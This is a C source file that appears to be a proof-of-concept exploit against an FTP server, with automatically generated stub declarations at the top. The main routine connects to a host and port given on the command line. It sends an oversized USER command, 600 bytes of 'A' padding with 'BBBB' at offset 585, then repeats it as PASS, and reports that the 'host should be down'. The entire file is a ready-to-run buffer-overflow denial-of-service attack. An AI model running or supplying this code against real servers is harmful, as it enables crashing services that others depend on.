
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct in_addr {int dummy; } ;
struct sockaddr_in {char sin_zero; struct in_addr sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int WSADATA ;


 int MAKEWORD (int,int ) ;
 int PF_INET ;
 int SOCK_STREAM ;
 int WSACleanup () ;
 int WSAGetLastError () ;
 int WSAStartup (int ,int *) ;
 int atoi (char*) ;
 int connect (int,struct sockaddr*,int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;
 int recv (int,char*,int,int ) ;
 int send (int,char*,int ,int ) ;
 int socket (int ,int ,int ) ;
 int strlen (char*) ;

int main(int argc, char* argv[])
{
 struct hostent *he;
 struct sockaddr_in sock_addr;
 WSADATA wsa;
 int ftpsock;
 char recvbuff[1024];
 char evilbuff[1024];
 int buflen=600;

 if (argc!=3)
 {
  printf("[+] Usage: %s <ip> <port>\n",argv[0]);
  return 1;
 }
 WSACleanup();
 WSAStartup(MAKEWORD(2,0),&wsa);

 printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
 if ((he=gethostbyname(argv[1])) == ((void*)0)) {
  printf("Failed\n[-] Could not init gethostbyname\n");
  return 1;
 }
 if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
  printf("Failed\n[-] Socket error\n");
  return 1;
 }

 sock_addr.sin_family = PF_INET;
 sock_addr.sin_port = htons(atoi(argv[2]));
 sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(sock_addr.sin_zero), '\0', 8);
 if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
  printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
  return 1;
 }
 printf("OK\n");
 memset(recvbuff,'\0',1024);
 recv(ftpsock, recvbuff, 1024, 0);

 printf("[+] Building payload ... ");
 memset(evilbuff,'A',buflen);
 memset(evilbuff+585,'B',4);
 memcpy(evilbuff,"USER ",5);
 memcpy(evilbuff+buflen,"\r\n\0",3);
 printf("OK\n[+] Sending USER ... ");
 if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
  printf("Failed\n[-] Could not send\n");
  return 1;
 }
 printf("OK\n");
 memset(recvbuff,'\0',1024);
 recv(ftpsock, recvbuff, 1024, 0);

 memcpy(evilbuff,"PASS ",5);
 printf("[+] Sending PASS ... ");
 if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
  printf("Failed\n[-] Could not send\n");
  return 1;
 }
 printf("OK\n");
 recv(ftpsock, recvbuff, 1024, 0);

 printf("[+] Host should be down\n");
 return 0;
}
